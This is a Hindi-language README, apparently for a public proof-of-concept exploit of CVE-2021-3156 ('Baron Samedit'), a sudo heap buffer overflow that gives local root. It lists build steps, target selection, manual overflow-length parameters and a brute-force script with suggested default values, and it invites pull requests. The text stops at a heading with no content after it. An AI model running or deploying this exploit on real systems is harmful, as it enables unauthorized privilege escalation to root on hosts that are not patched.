
CVE-2021-3156 (बैरन सेमेडिट) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo में एक हीप-आधारित बफर ओवरफ्लो जो स्थानीय विशेषाधिकार वृद्धि को रूट तक सक्षम बनाता है। एकाधिक लक्ष्यों और ब्रूट-फोर्स मोड का समर्थन करता है।
यह Qualys द्वारा Baron Samedit नामित CVE-2021-3156 sudo भेद्यता का एक शोषण है।
निर्माण:
$ make
लक्ष्य सूची:
$ ./sudo-hax-me-a-sandwich
चलाएँ:
$ ./sudo-hax-me-a-sandwich <target_number>
मैन्युअल मोड:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
सुनिश्चित करें कि आपके पास GNU parallel स्थापित है।
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
प्रयास करने के लिए कुछ डिफ़ॉल्ट मान:
$ ./brute.sh 90 120 50 70 150 300
यह सभी उपलब्ध कोर का उपयोग करेगा। नेटफ्लिक्स & ब्रूटफोर्स एक साथ न करें।
समझदारी वाले PR भेजें, मैं मर्ज कर सकता हूँ।
कुछ विचार: